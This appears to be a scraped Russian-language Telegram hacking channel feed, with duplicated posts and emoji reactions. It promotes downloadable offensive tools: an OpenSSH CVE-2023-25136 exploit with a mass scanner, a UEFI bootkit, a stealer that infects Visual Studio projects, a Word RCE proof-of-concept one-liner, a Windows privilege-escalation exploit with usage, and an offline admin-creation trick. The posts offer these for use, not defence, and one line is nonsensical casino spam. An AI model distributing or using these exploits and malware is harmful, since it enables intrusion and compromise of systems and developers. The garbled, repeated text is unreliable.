OpenSSH 9.1 exploit and mass scan
*
Уязвимость CVE-2023-25136 влияет на процесс предварительной аутентификации SSH. Используя его, атакующий может повредить память и выполнить произвольный код на машине без аутентификации на целевом сервере.
download exploit and mass scan
#ssh #exploit #scanner
*
Уязвимость CVE-2023-25136 влияет на процесс предварительной аутентификации SSH. Используя его, атакующий может повредить память и выполнить произвольный код на машине без аутентификации на целевом сервере.
download exploit and mass scan
#ssh #exploit #scanner
🔥19👍4
bootlicker
Устаревший (?) расширяемый руткит прошивки UEFI, предназначенный для виртуальных машин гипервизора vmware. Он предназначен для выполнения начального кода в контексте ядра Windows, независимо от настроенных параметров безопасности.
*
vmvware-bootkit основан на устаревших руткитах
*
Download bootlicker
#rootkit #bootkit
Устаревший (?) расширяемый руткит прошивки UEFI, предназначенный для виртуальных машин гипервизора vmware. Он предназначен для выполнения начального кода в контексте ядра Windows, независимо от настроенных параметров безопасности.
*
vmvware-bootkit основан на устаревших руткитах
CosmicStrain, MoonBounce и ESPECTRE, что позволяет выполнять произвольное выполнение кода без срабатывания patchguard*
Download bootlicker
#rootkit #bootkit
😱6👍2
TCP Data Transfer Tool
Прикольно конечно в кернелМемори писать гадости\радости всякие.
В общем получается почти !!!
Скачать бесплатно и без смс уникальный крест доминика торето сделанный из легендарной финки нквд можно только на джойказино, мать его.
Прикольно конечно в кернелМемори писать гадости\радости всякие.
В общем получается почти !!!
fileless attack, техника не новая и что там с runtime детектами не понятно, но все равно интересно.Скачать бесплатно и без смс уникальный крест доминика торето сделанный из легендарной финки нквд можно только на джойказино, мать его.
👍5
APT38_0day-Stealer.rar
7.2 KB
Lazarus-Tactic (APT38)
*
Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).
В общем такой
*
Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).
В общем такой
0day-stealer
**После запуска программа заразит все ваши проекты Visual Studio**🔥21😱8👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Внимание !
через 10 минут опять понедельник.
Вот вам rootkit dog
😎
через 10 минут опять понедельник.
Вот вам rootkit dog
😎
🔥20😱6👍2
0-CLICK Microsoft Word RCE exploit
CVE-2023-21716 Python
CVE-2023-21716 Python
PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))😱16👍7🔥1
CVE-2023-21768 Local Privilege Escalation
Windows 11 22H2
POC exploit
*
usage:
#windows #lpe
Windows 11 22H2
POC exploit
*
usage:
Windows_AFD_LPE_CVE-2023-21768.exe <pid>
где <pid> это id процесса который нужно повысить до system#windows #lpe
😱10👍3🔥2
Offline создание администратора Windows 10? 😈
Ога
Всё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.
OfflineAddAdmin2 (это новая версия)
Видео туториал
Ога
Всё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.
OfflineAddAdmin2 (это новая версия)
Видео туториал
😱9🔥2👍1